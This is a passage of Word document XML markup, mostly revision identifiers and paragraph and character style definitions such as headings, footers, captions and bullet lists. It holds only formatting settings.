    <w:rsid w:val="00F956BB"/>
    <w:rsid w:val="00F958FF"/>
    <w:rsid w:val="00F964BC"/>
    <w:rsid w:val="00F97317"/>
    <w:rsid w:val="00F9756B"/>
    <w:rsid w:val="00F97BE9"/>
    <w:rsid w:val="00F97EE5"/>
    <w:rsid w:val="00FA0158"/>
    <w:rsid w:val="00FA1248"/>
    <w:rsid w:val="00FA1542"/>
    <w:rsid w:val="00FA1BB5"/>
    <w:rsid w:val="00FA1DFA"/>
    <w:rsid w:val="00FA347C"/>
    <w:rsid w:val="00FA4EEC"/>
    <w:rsid w:val="00FA66B1"/>
    <w:rsid w:val="00FA66C8"/>
    <w:rsid w:val="00FA72A0"/>
    <w:rsid w:val="00FB0A91"/>
    <w:rsid w:val="00FB1042"/>
    <w:rsid w:val="00FB1A9A"/>
    <w:rsid w:val="00FB2023"/>
    <w:rsid w:val="00FB22FF"/>
    <w:rsid w:val="00FB2CC7"/>
    <w:rsid w:val="00FB2D42"/>
    <w:rsid w:val="00FB3C81"/>
    <w:rsid w:val="00FB448A"/>
    <w:rsid w:val="00FB489B"/>
    <w:rsid w:val="00FB50F5"/>
    <w:rsid w:val="00FB5550"/>
    <w:rsid w:val="00FB6092"/>
    <w:rsid w:val="00FB6221"/>
    <w:rsid w:val="00FB6972"/>
    <w:rsid w:val="00FB6A3E"/>
    <w:rsid w:val="00FB6FC1"/>
    <w:rsid w:val="00FB6FCE"/>
    <w:rsid w:val="00FB7158"/>
    <w:rsid w:val="00FC1ADD"/>
    <w:rsid w:val="00FC24A9"/>
    <w:rsid w:val="00FC2C6E"/>
    <w:rsid w:val="00FC35E7"/>
    <w:rsid w:val="00FC3797"/>
    <w:rsid w:val="00FC3986"/>
    <w:rsid w:val="00FC6C06"/>
    <w:rsid w:val="00FC70D2"/>
    <w:rsid w:val="00FD1A39"/>
    <w:rsid w:val="00FD1FA1"/>
    <w:rsid w:val="00FD21B2"/>
    <w:rsid w:val="00FD2947"/>
    <w:rsid w:val="00FD2A72"/>
    <w:rsid w:val="00FD3763"/>
    <w:rsid w:val="00FD3F77"/>
    <w:rsid w:val="00FD3FC6"/>
    <w:rsid w:val="00FD4003"/>
    <w:rsid w:val="00FD5218"/>
    <w:rsid w:val="00FD58BF"/>
    <w:rsid w:val="00FD7CBD"/>
    <w:rsid w:val="00FE0328"/>
    <w:rsid w:val="00FE07FD"/>
    <w:rsid w:val="00FE0847"/>
    <w:rsid w:val="00FE0E36"/>
    <w:rsid w:val="00FE1E8A"/>
    <w:rsid w:val="00FE32B8"/>
    <w:rsid w:val="00FE4089"/>
    <w:rsid w:val="00FE40FE"/>
    <w:rsid w:val="00FE4B98"/>
    <w:rsid w:val="00FE5677"/>
    <w:rsid w:val="00FE71D3"/>
    <w:rsid w:val="00FF042C"/>
    <w:rsid w:val="00FF08EE"/>
    <w:rsid w:val="00FF1255"/>
    <w:rsid w:val="00FF2C82"/>
    <w:rsid w:val="00FF3810"/>
    <w:rsid w:val="00FF3D4F"/>
    <w:rsid w:val="00FF5BC5"/>
    <w:rsid w:val="00FF7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7096DDFE"/>
  <w15:docId w15:val="{0F4FA980-1B20-4643-95C0-5E28B9EF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4" w:qFormat="1"/>
    <w:lsdException w:name="heading 5" w:uiPriority="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8"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8"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8" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="List Number" w:uiPriority="98"/>
    <w:lsdException w:name="List 2" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List 3" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List 4" w:uiPriority="98"/>
    <w:lsdException w:name="List 5" w:uiPriority="98"/>
    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:uiPriority="9"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iPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Title" w:qFormat="1"/>
    <w:lsdException w:name="Closing" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Signature" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List Continue" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Subtitle" w:uiPriority="30" w:qFormat="1"/>
    <w:lsdException w:name="Salutation" w:uiPriority="98"/>
    <w:lsdException w:name="Date" w:uiPriority="98"/>
    <w:lsdException w:name="Body Text First Indent" w:uiPriority="98"/>
    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Block Text" w:semiHidden="1" w:uiPriority="98"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iPriority="98"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8" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:uiPriority="98" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:uiPriority="98"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8"/>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8" w:qFormat="1"/>
    <w:lsdException w:name="Intense Quote" w:uiPriority="9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98" w:qFormat="1"/>
    <w:lsdException w:name="Intense Reference" w:uiPriority="98" w:qFormat="1"/>
    <w:lsdException w:name="Book Title" w:uiPriority="98"/>
    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="9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8"/>
    <w:qFormat/>
    <w:rsid w:val="00027D8E"/>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Text"/>
    <w:next w:val="Text"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="004B4F82"/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="500"/>
      </w:tabs>
      <w:spacing w:before="600" w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times"/>
      <w:color w:val="CC0000"/>
      <w:kern w:val="32"/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Text"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006213FC"/>
    <w:pPr>
      <w:pageBreakBefore w:val="0"/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="500"/>
        <w:tab w:val="left" w:pos="700"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Heading2"/>
    <w:next w:val="Text"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B6310E"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="700"/>
        <w:tab w:val="left" w:pos="902"/>
      </w:tabs>
      <w:spacing w:before="360" w:after="180"/>
      <w:ind w:left="697"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Heading3"/>
    <w:next w:val="Text"/>
    <w:uiPriority w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="004B4F82"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="902"/>
        <w:tab w:val="left" w:pos="1100"/>
      </w:tabs>
      <w:spacing w:before="420" w:after="240"/>
      <w:ind w:left="1100" w:hanging="1100"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Heading4"/>
    <w:next w:val="Text"/>
    <w:uiPriority w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="004B4F82"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1100"/>
        <w:tab w:val="left" w:pos="1077"/>
      </w:tabs>
      <w:spacing w:before="480"/>
      <w:ind w:left="1100" w:hanging="1100"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:rsid w:val="00721B9D"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:rsid w:val="00721B9D"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:rsid w:val="00721B9D"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:rsid w:val="00721B9D"/>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link w:val="TextCharChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002F7918"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextCharChar">
    <w:name w:val="Text Char Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Text"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="002F7918"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Header2Char">
    <w:name w:val="Header 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header2"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="13"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Header2">
    <w:name w:val="Header 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Header2Char"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:pPr>
      <w:spacing w:line="200" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="13"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00F6289D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="9700"/>
      </w:tabs>
      <w:spacing w:line="180" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="13"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="13"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:rPr>
      <w:rFonts w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Address">
    <w:name w:val="Address"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00F6289D"/>
    <w:pPr>
      <w:framePr w:hSpace="181" w:wrap="around" w:vAnchor="page" w:hAnchor="text" w:y="2978"/>
      <w:spacing w:line="260" w:lineRule="exact"/>
      <w:suppressOverlap/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
      <w:noProof/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AddressBold">
    <w:name w:val="Address Bold"/>
    <w:basedOn w:val="Address"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:framePr w:hSpace="0" w:wrap="around" w:y="2921"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BasicParagraph">
    <w:name w:val="[Basic Paragraph]"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="288" w:lineRule="auto"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times-Roman"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLVariable">
    <w:name w:val="HTML Variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DocumentMap">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Tahoma"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EnvelopeReturn">
    <w:name w:val="envelope return"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextCharChar">
    <w:name w:val="Body Text Char Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-GB" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent2">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
        <w:tab w:val="left" w:pos="4820"/>
      </w:tabs>
      <w:spacing w:line="264" w:lineRule="exact"/>
      <w:ind w:left="284"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent3">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CaptionChar"/>
    <w:uiPriority w:val="98"/>
    <w:qFormat/>
    <w:rsid w:val="00745936"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz w:val="16"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Delete">
    <w:name w:val="Delete"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:before="160"/>
    </w:pPr>
    <w:rPr>
      <w:strike/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EnvelopeAddress">
    <w:name w:val="envelope address"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:framePr w:w="7920" w:h="1980" w:hRule="exact" w:hSpace="180" w:wrap="auto" w:hAnchor="page" w:xAlign="center" w:yAlign="bottom"/>
      <w:ind w:left="2880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeCommand">
    <w:name w:val="Code Command"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="006F0A71"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:b/>
      <w:i/>
      <w:noProof/>
      <w:color w:val="auto"/>
      <w:sz w:val="16"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
      <w:color w:val="4A93D1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:pPr>
      <w:ind w:left="180" w:hanging="180"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
      <w:sz w:val="13"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-GB" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00924B50"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:line="260" w:lineRule="exact"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Index1"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00074E30"/>
    <w:rPr>
      <w:color w:val="4A93D1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="IndexTOC">
    <w:name w:val="Index TOC"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times"/>
      <w:color w:val="808080"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:noProof/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="004A5ED2"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBullet1text">
    <w:name w:val="List Bullet 1 text"/>
    <w:basedOn w:val="Text"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00510854"/>
    <w:pPr>
      <w:ind w:left="369"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Text"/>
    <w:next w:val="ListBullet2text"/>
    <w:link w:val="ListBullet2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0002414C"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="40"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBullet2text">
    <w:name w:val="List Bullet 2 text"/>
    <w:basedOn w:val="ListBullet2"/>
    <w:qFormat/>
    <w:rsid w:val="00FB6092"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:ind w:left="728"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet3">
    <w:name w:val="List Bullet 3"/>
    <w:basedOn w:val="Text"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0002414C"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="40"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet4">
    <w:name w:val="List Bullet 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="40"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet5">
    <w:name w:val="List Bullet 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="40"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListBulletCharChar">
    <w:name w:val="List Bullet Char Char"/>
